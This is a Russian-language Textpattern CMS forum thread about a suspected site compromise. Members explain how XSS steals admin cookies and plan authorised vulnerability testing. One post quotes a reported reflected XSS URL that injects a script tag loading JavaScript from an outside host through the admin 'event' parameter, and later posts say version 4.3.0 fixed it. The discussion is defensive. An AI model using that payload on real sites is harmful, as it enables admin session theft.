Textpattern - на русском языке

форум общения русскоязычных пользователей CMS Текстпаттерн

Вы не зашли.

#1 10-07-2007 12:11:28

Evgeny
ять
Зарегистрирован: 15-03-2005
Сообщений: 1869

XSS или не XSS?

Тут мне конфиденциально написали, что на ТхП сайте злоумышленниками был модифицирован index.php, куда был вставлен инородный код.

Подобное в общем-то уже было здесь и здесь. Но тогда ТхП был не причем.

Что имеем в этот раз?

Версия ТхП - 4.0.3
Установлено много редких и самописных плагинов.
FTP-пароль - только у одного пользователя. Наряду с FTP-паролем к этому сайту - на компе лежали и пароли к другим сайтам, на которых деструктивных действий замечено не было. Т.е. троян, похоже, отпадает.

Хостер из малоизвестных, но проверенный (не назван). То есть взлом со стороны хостера владельцем исключается.

У владельца сайта подозрение на XSS.
Я проверил контролируемые мной сайты, работающие под 4.0.3 - там все нормально.

По поводу XSS.
Слышал много про нее, но не вникал. Пробежался по Гуглам - сложилось впечатление, что XSS не ориентирован на модификацию исходных файлов.
Если есть знающие - пусть просвятят по изложенным симптомам - в чем может быть причина? Похоже это на XSS-атаку?


Но весть плохая :-(
Придется апгрейдить все сайты на 4.0.5.

Большая просьба проверить все сайты под 4.0.3 и если есть какие подозрения - поставить общественность в известность.
Если нет желания говорить публично, то можно сообщить персонально.
Если неудобно светить имя сайта (как в этом случае) - сохраним все в тайне.

P.S. Цитата с какого-то сайта по безопасности

ЕДИНСТВЕННАЯ СИТУАЦИЯ, КОГДА ТЫ МОЖЕШЬ НЕ БЕСПОКОИТЬСЯ О БЕЗОПАСНОСТИ САЙТА В ПЛАНЕ XSS — ЭТО ЕСЛИ ОН СОДЕРЖИТ ИСКЛЮЧИТЕЛЬНО СТАТИЧЕСКИЕ TXT И HTML-СТРАНИЦЫ

Отредактированно Evgeny (10-07-2007 18:14:43)

Неактивен

 

#2 10-07-2007 17:50:56

PolyGon
наш
Зарегистрирован: 26-12-2006
Сообщений: 211

Re: XSS или не XSS?

Ерунда какая-то. Если ещё всё в верхнем регистре, то больше похоже на истерику, чем на что-то реальное.

Неактивен

 

#3 10-07-2007 18:16:34

Evgeny
ять
Зарегистрирован: 15-03-2005
Сообщений: 1869

Re: XSS или не XSS?

Это я, видимо, неуместно, процитировал какой-то - да, истерический лозунг, с какого-то сайта по безопасности.

Отредактировал свое предыдущее сообщение.

Неактивен

 

#4 10-07-2007 18:24:50

PolyGon
наш
Зарегистрирован: 26-12-2006
Сообщений: 211

Re: XSS или не XSS?

Но в двух темах в этом форуме TxP к этому не имел никакого отношения. Т.е. виной были настройки сервера. Отсюда и нужно начинать смотреть. Неплохо было бы посмотреть файл, пермишены на файлы и директории, конфиги и т.п., прежде чем делать громкие заявления про взлом. IMHO.

Неактивен

 

#5 10-07-2007 19:16:10

bons
есть
Зарегистрирован: 10-07-2006
Сообщений: 66

Re: XSS или не XSS?

Evgeny, есть замечательная прога Xspider, межсайтовый скриптинг выявляет "на ура"

О программе:
http://www.ptsecurity.ru/xs7.asp

Загрузить демо-версию
http://www.ptsecurity.ru/xs7download.asp

В демо-версии программа позволяет найти уязвимость, но может не показать расширенный обзор по конкретной уязвимости(в любом случае рекомендую ознакомиться)

У меня есть полная версия программы, но!

У меня нет своих ТхП 4.0.3
У меня не стоит денвер, я не юзаю TP локально.
Мой провайдер вырубает сайт при попытке произвести анализ в сетевом режиме.

Если есть возможность на каком либо сайте санкционировано произвести проверку, то готов предложить свои услуги.

PS: какие еще скрипты работают в связке с TP на сайте упомянутом в первом посте?

Уверен, что проблема не в TP

Отредактированно bons (10-07-2007 19:20:56)

Неактивен

 

#6 10-07-2007 20:49:53

Evgeny
ять
Зарегистрирован: 15-03-2005
Сообщений: 1869

Re: XSS или не XSS?

PolyGon написал:

прежде чем делать громкие заявления про взлом.

Согласен.
Я честно говоря, полагаю, что если найдется дыра, то первым это ощутит англоязычной сообщество.
Второй момент. То, что модифицируется index.php - сильно похоже, на утечку FTP пароля. Я к сожалению - не слишком силен во взломах. :-(

НО! я сам постепенно ухожу от 4.0.3.
И вот это предупреждение (от серьезного человека, который сам по каким-то причинам не захотел создавать тему),
только стимулирует ускорение этого ухода.

bons написал:

PS: какие еще скрипты работают в связке с TP на сайте упомянутом в первом посте?

Я тоже спросил об этом. Скрипты не были названы. Скрипты сторонние есть, но на поддоменах.

bons написал:

Уверен, что проблема не в TP

Я тоже так думаю. Но так как серьезность человека, попавшего в такую переделку, не вызывает сомнений, я посчитал, что не надо втихую отсиживаться по кустам.

Не надо расценивать мой пост как панику. :-)

Но бдительность терять тоже не надо. :-))

Отредактированно Evgeny (10-07-2007 21:02:45)

Неактивен

 

#7 10-07-2007 21:17:01

glebotr
ять
Зарегистрирован: 25-06-2005
Сообщений: 1974
Вебсайт

Re: XSS или не XSS?

НБдительность она да. Впрочем, мой сайтик уже пробовали на предмет чего-то в этом роде, кажется, безуспешно (тук-тук).


Пх’нглуи мглв’нафх Ленин Красная площадь вгах’нагл фхтагн
(В своем доме на Красной площади мертвый Ленин спит, ожидая своего часа (ктулх.))

Неактивен

 

#8 11-07-2007 01:56:14

PolyGon
наш
Зарегистрирован: 26-12-2006
Сообщений: 211

Re: XSS или не XSS?

Через неделю могу предоставить сервер для проверки. Можно и конфигурацию оговорить, и несколько заходов произвести. И договор составить, что проводимые работы согласованы сторонами и не являются попыткой взлома, чтобы не было вопросов у тех, кто их задаёт периодически.

Неактивен

 

#9 11-07-2007 10:19:38

Evgeny
ять
Зарегистрирован: 15-03-2005
Сообщений: 1869

Re: XSS или не XSS?

PolyGon написал:

Через неделю могу предоставить сервер для проверки.

Круто!

Ну давай подумаем логически. Какие источники для взлома могут быть?
Только там, где пользователь может вводить какие-то данные. Или я ошибаюсь?

Вариант со взломом админ.панели отбросим сразу. Там только подбор пароля может сработать.
Если есть сомнения а админ.панели, то можно поставить дополнительный заслон.

Сразу заметим, что если используется плагин для массовой регистрации (mem_self_register, кажется ), то надежность системы падает (потенциально). и в этом случае доп. заслон ставить не имеет смысла, не поможет.
Стоит ли рассматривать этот вариант?

Следующий момент - Комментарии. Но думаю, что этот кусок кода весь вылизан давным-давно. Плюс - массовое применение ТхП в качестве блога с комментариями дает все основания полагать, что тут вряд ли враг может сделать свою бяку.

Остаются плагины.
Плагин для голосования - вот что первое в голову приходит.
Zem_contact - во вторую :-)
(но Zem-Contact не обращается ни к файловой системе, ни к базе. Он обращается только к sendmail )

других сходу и не вспомню, которые бы позволяли что-то делать пользователю.

Неактивен

 

#10 11-07-2007 19:20:18

PolyGon
наш
Зарегистрирован: 26-12-2006
Сообщений: 211

Re: XSS или не XSS?

Если честно, то лень думать - тяжёлая неделя для этой планеты выдалась. Лучше подготовить план тестирования.

Предлагаю сначала на тестовый сервер поставить "чистые" 4.0.3, 4.0.4, 4.0.5, а потом "сборки" на их основе. Короче - нужно сформировать список "кандидатов".

Будет задействовано 2 или 3 разных сервера с разными OS, Apache, PHP, MySQL и настройками. Число серверов зависит от методик и будет предметом дополнительного обсуждения.

Если это не "поможет" сломать систему, то можно будет оставить одну тестовую систему и дополнять её популярными плагинами.

Неактивен

 

#11 12-07-2007 15:59:10

sams
аз
Откуда: belarus
Зарегистрирован: 28-06-2007
Сообщений: 4

Re: XSS или не XSS?

Evgeny написал:

Если есть знающие - пусть просвятят по изложенным симптомам - в чем может быть причина? Похоже это на XSS-атаку?

Хочу уточнить, что данная атака в общем трудноосуществимая, однако недооценивать её действительно не стоит.  Здесь наглядный видео-пример как с помощью xss-дырки был взломан форум секъюлаба.

Основной целью атаки является получение административных реквизитов владельца сайта, путем кражи идентификационных данных из сессии.

Сущность xss-атаки, примерно следующая:
Находиться непосредственно xss-уязвимость на сайте жертвы. Под xss-дыркой подразумевается возможность выполнения скриптов (в основном JavaScript) на стороне клиента.
Причина уязвимости заключается в отсутствии или недостаточной фильтрации небезопасных символов в данных, вводимых пользователем. Например, если при регистрации вместо строки "Вася Пупкин" в поле ввода имени пользователя поместить конструкцию "Вася Пупкин<image src='' onerror=alert('XSS!!!')>", и если после регистрации при выводе данного поля движок не отэкранирует опасные символы, браузер (в большинстве случаев) выплюнет мессаджбокс с надписью «XSS!!!».
Так вот. Далее пишется javascript-код, который не выплевывает мессаджбоксы, а незамысловато тырит кукисы юзера, открывшего в браузере инфицированную хss-кодом страничку.  В кукисах-то и находится та самая вкусная информация (пароли, хэши, идентификаторы сессии, и т.д), с помощью которых можно без проблем очутиться в админ-панели сайта-жертвы.

Главной и основной задачей для взломщика – это удачно впарить ядовитую ссылку на ядовитую страничку админу ресурса. В основном используют почту, лички, аськи и т.д. Причем успешность атаки определяется условием нахождения админа в админ-панеле. 

Так что, уважаемый Evgeny, если вы недавно ходили по подозрительным ссылкам из-под админки, то вполне возможно, это и есть тот самый симптом xss-атаки.

Таким образом, для профилактики от хss-атак смотрите чаще на ссылки по которым ходите (хотя дырявые браузеры могут жестоко обмануты, подменой урла).

И обязательно закрывайте сессию, тобишь пользуйтесь кнопками/линками "выйти из системы".
Возможно немного сумбурно, но в целом, я полагаю, смысл понятен.

Отредактированно sams (12-07-2007 16:11:10)

Неактивен

 

#12 12-07-2007 16:47:41

Evgeny
ять
Зарегистрирован: 15-03-2005
Сообщений: 1869

Re: XSS или не XSS?

sams написал:

Так что, уважаемый Evgeny, если вы недавно ходили по подозрительным ссылкам из-под админки

Ну вот.. связали автора публикации с жертвой атаки :-))
Так и рождаются легенды :-)

sams, спасибо за столь развернутое пояснение. Как понял - XSS ориентирован на получение доступа в админку.
в описываемом случае это было не так. была модификация файла.

Отредактированно Evgeny (12-07-2007 16:47:57)

Неактивен

 

#13 12-07-2007 18:46:15

sams
аз
Откуда: belarus
Зарегистрирован: 28-06-2007
Сообщений: 4

Re: XSS или не XSS?

Evgeny написал:

Ну вот.. связали автора публикации с жертвой атаки :-))

Извиняюсь, за невнимательную ошибку.

Evgeny написал:

Как понял - XSS ориентирован на получение доступа в админку.
в описываемом случае это было не так. была модификация файла.

Имхо, имея доступ к админке, аплоад/модификация/удаление файла(ов) - не такое уж и хитрое дело.

Честно говоря, я совсем недавно познакомился с txp. (Возможно, следующую часть поста можно поместить в ветку про «пеар» wink, но напишу здесь) С первого взгляда движок заинтересовал меня именно отсутствием публичных эксплоитов под него, т.е. своей безопасностью. Понятно, что по мере популяризации движка в массы, найдутся личности, которые захотят проверить его на прочность, и которые найдут таки слабые места (и, судя по этой ветке, вероятно, они уже имеются). Однако сейчас я понемногу уже въехал в концепцию движка, представляющий собой конструктор лего, где txp-тэги выступают в роле деталек, и понял что это довольно интересный проект с интересным сообществом.
Появилось желание разобраться и сделать блог на данном движке, и соответственно попытаться сделать его ещё безопаснее.  Посему с удовольствием помогу в «ломании» тестовых систем PolyGon’a smile
Ну и вдогонку, предложу завести на форуме раздел «Безопасность», в котором бы освещались подобные темы.

Отредактированно sams (12-07-2007 18:50:26)

Неактивен

 

#14 13-07-2007 10:06:25

Evgeny
ять
Зарегистрирован: 15-03-2005
Сообщений: 1869

Re: XSS или не XSS?

sams написал:

Возможно, следующую часть поста можно поместить в ветку про «пеар»

Если считаешь нужным поместить- помещай :-)

sams написал:

Посему с удовольствием помогу в «ломании» тестовых систем PolyGon’a smile

Напиши ему письмо. и сообщи об этом :-)
Мне кажется подготовку с конкретными деталями тестирования лучше всего переносить в приват, здесь оставляя только общие вопросы.

sams написал:

Ну и вдогонку, предложу завести на форуме раздел «Безопасность», в котором бы освещались подобные темы.

За всю историю форума подобный топик- третий. Здесь же, в первом посте, указаны ссылки на предыдущет два.

Неактивен

 

#15 17-07-2007 16:20:15

PolyGon
наш
Зарегистрирован: 26-12-2006
Сообщений: 211

Re: XSS или не XSS?

Коллеги, возвращаясь к тестированию TxP "на пробой". Прошу описать методы, которые будут применяться. После согласования процедуры тестирования дам доступ к первой партии 4.0.4. и 4.0.5.

Неактивен

 

#16 18-07-2007 00:19:03

bons
есть
Зарегистрирован: 10-07-2006
Сообщений: 66

Re: XSS или не XSS?

Будет анализироваться контент: осуществляться поиск уязвимостей(sql-инъекции, удаленное выполнение команд, просмотр произвольных файлов, межсайтовый скриптинг) в get и post запросах, сложная проверка по алгоритмам.

Анализироваться контент будет программно с помощью приложения Xspider.

попытаемся не устраивать DoS

Нужны: адреса хостов
Связь

Отредактированно bons (18-07-2007 00:20:14)

Неактивен

 

#17 18-07-2007 15:08:21

Evgeny
ять
Зарегистрирован: 15-03-2005
Сообщений: 1869

Re: XSS или не XSS?

в качестве объекта тестирования предлагется использовать сборку Txp-Блог версии 4.0.4, у которой, после установки надо снять ограничение по сроку добавления комменатриев к статьям.

В ближайшее время, если есть в этом необходимость, переведу сборку на 4.0.5.
Это так и так надо делать, но все руки не дойдут :-( А тут стимул будет :-)

Неактивен

 

#18 01-08-2007 18:40:55

Evgeny
ять
Зарегистрирован: 15-03-2005
Сообщений: 1869

Re: XSS или не XSS?

После некотоого внутреннего расследования пострадавший написал, что склоняется к мысли , что это, все же был троян.

В процессе изучения ситуации выяснилось, что глобальные переменные у него были включены.

Желательно всем проверить состояние своего .htaccess !
Если в вашем - строка
php_value register_globals 0
закомментирована - раскомментируйте ее.
После чего обязательно проверьте работоспособность сайта!
Если все ок, то так и оставьте.

Отредактированно Evgeny (01-08-2007 18:41:37)

Неактивен

 

#19 10-11-2010 17:38:00

Gerich
земля
Зарегистрирован: 07-09-2008
Сообщений: 100

Re: XSS или не XSS?

Evgeny написал:

После некотоого внутреннего расследования пострадавший написал, что склоняется к мысли , что это, все же был троян.

В процессе изучения ситуации выяснилось, что глобальные переменные у него были включены.

Желательно всем проверить состояние своего .htaccess !
Если в вашем - строка
php_value register_globals 0
закомментирована - раскомментируйте ее.
После чего обязательно проверьте работоспособность сайта!
Если все ок, то так и оставьте.

Я попробовал это сделать но в результате этого сайт перестает работать, выводится сообщение Internal Server Error. Версия TXP 4.2.0  Почему такое может быть?

Неактивен

 

#20 11-11-2010 13:09:26

the_ghost
ять
Откуда: Минск
Зарегистрирован: 01-05-2007
Сообщений: 1957
Вебсайт

Re: XSS или не XSS?

register_globals уже давно отключено на всех нормальных хостингах. В противном случае в диагностике ТХП выводится сообщение об этом. О том, как отключить эту функцию, лучше узнать у своего хостера.


.      Создание шаблонов для Textpatern http://textpattern.ru/forum/viewtopic.php?id=1665 (<txp:make_template quality="best" />)
КОНСУЛЬТАЦИИ по Textpattern - ICQ#8458496, nemiga@gmail.com <txp:if_question><txp:pay /></txp:if_question>
       Список всех тегов - http://textbook.textpattern.net/wiki/in … _Reference

Неактивен

 

#21 11-11-2010 22:19:06

Gerich
земля
Зарегистрирован: 07-09-2008
Сообщений: 100

Re: XSS или не XSS?

Ясно, буду узнавать.
Вот мне на днях сообщили что на моём сайте есть уязвимость:
"http://domen.com/textpattern/index.php?event=<SCRIPT type=text/javascript src=http://httpz.ru/y3c8l1t9awgo.js></SCRIPT>
ВОТ ПАССИВНАЯ XSS"

Как же можно закрыть эту уязвимость?

Неактивен

 

#22 12-11-2010 01:36:54

the_ghost
ять
Откуда: Минск
Зарегистрирован: 01-05-2007
Сообщений: 1957
Вебсайт

Re: XSS или не XSS?

1. Это работает только когда вы залогинены на сайте.
2. Зачем вы открываете ссылки с явно странными урлами?
3. Пойду сообщу разработчикам - может что-нить придумают.


.      Создание шаблонов для Textpatern http://textpattern.ru/forum/viewtopic.php?id=1665 (<txp:make_template quality="best" />)
КОНСУЛЬТАЦИИ по Textpattern - ICQ#8458496, nemiga@gmail.com <txp:if_question><txp:pay /></txp:if_question>
       Список всех тегов - http://textbook.textpattern.net/wiki/in … _Reference

Неактивен

 

#23 12-11-2010 11:41:00

advan
ю
Откуда: Mk
Зарегистрирован: 05-11-2006
Сообщений: 835
Вебсайт

Re: XSS или не XSS?

Changes in 4.3.0
* Security: Fixed two XSS vulnerabilities (thanks Jorge Hoya and High-Tech Bridge). Updates are recommended.

Возможно, уже поправлено. Gerich, попробуйте обновиться.


Знакомьтесь на здоровье - http://love.kachok.ru  /  Я в PHP ниПХПуя незнаю! :)

Неактивен

 

#24 12-11-2010 13:13:26

the_ghost
ять
Откуда: Минск
Зарегистрирован: 01-05-2007
Сообщений: 1957
Вебсайт

Re: XSS или не XSS?

Точно, я по невнимательности не проверил баг на 4.3.0 - в нём добавили htmlspecialchars($event).
Сами изменения тут - http://code.google.com/p/textpattern/so … amp;r=3308

Проверил - в 4.3.0 спец. символы не проходят.

Ответ одного из разработчиков:

Stef Dawson ✆ кому: мне
Hi,

Thanks for bringing it to our attention but this was fixed in r3308
(http://code.google.com/p/textpattern/so … php?r=3308)

So if you're running 4.3.0 you should be protected from this type of
attack. Perhaps you could feed that back to the Russian forum so
there's a record of it out there?

Thanks,

Stef

Так что, ищем новые уязвимости smile


.      Создание шаблонов для Textpatern http://textpattern.ru/forum/viewtopic.php?id=1665 (<txp:make_template quality="best" />)
КОНСУЛЬТАЦИИ по Textpattern - ICQ#8458496, nemiga@gmail.com <txp:if_question><txp:pay /></txp:if_question>
       Список всех тегов - http://textbook.textpattern.net/wiki/in … _Reference

Неактивен

 

#25 12-11-2010 18:19:04

Gerich
земля
Зарегистрирован: 07-09-2008
Сообщений: 100

Re: XSS или не XSS?

Спасибо всем большое! Побежал обновлятся! И хакеру тому пойду передам спасибо, что сообщил мне об уязвимости.

Неактивен

 

Board footer

RSS   Rambler's Top100
Powered by PunBB
Textpattern.ru